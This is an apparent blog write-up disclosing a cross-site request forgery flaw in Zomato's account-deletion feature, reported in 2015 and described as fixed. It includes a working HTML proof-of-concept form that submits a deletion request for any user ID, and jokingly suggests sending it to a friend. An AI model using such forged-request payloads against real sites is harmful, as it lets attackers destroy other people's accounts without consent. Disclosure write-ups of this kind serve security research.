Hi friends 😀 ,
Zomato is an online restaurant search and discovery service providing information on home delivery, dining-out, cafés and nightlife for various cities of India and 21 other countries. It has 62.5 million registered users.
I was catched by it so i was messing around with zomato now while checking out the settings section i found the “delete my account ” option and after clicking on that a prompt will occur like this
Now to delete the account you have to type delete inside it and confirm ! but their was a flaw their was no csrf token available to validate the request ! .
What is CSRF TOKEN ?
CSRF token is a protective measure used to prevent cross site request forgery attacks which checks that the request is coming from the legitimate user or not !
Now Exploitation Part
i created a quick working code which allows you to delete the any user’s account so now to delete his or her account you just need send this code via html or as a link . 😛
<form action=”https://www.zomato.com/php/delete_user_profile.php method=”POST”>
<input type=”hidden” name=”reason” value=”woot woot”>
<input type=”hidden” name=”userid” value=”[User ID to whom you wanna delete]”>
<input type=”submit” value=”Submit request”>
Video Poc :
save this as delete.html and send this to your friend !
it was easy to grab any user ==>userid by just visiting their profile and copy that user id .Which increased it severity 😉
[+] Fixing Time line
[+] July 21, 2015 Reported to CEO (Report sent to Deepinder Goyal) ,CTO
[+] July 21, 2015 Reported to Support team
[+] Bug Fixed by team .
Let #internet be #safer place 🙂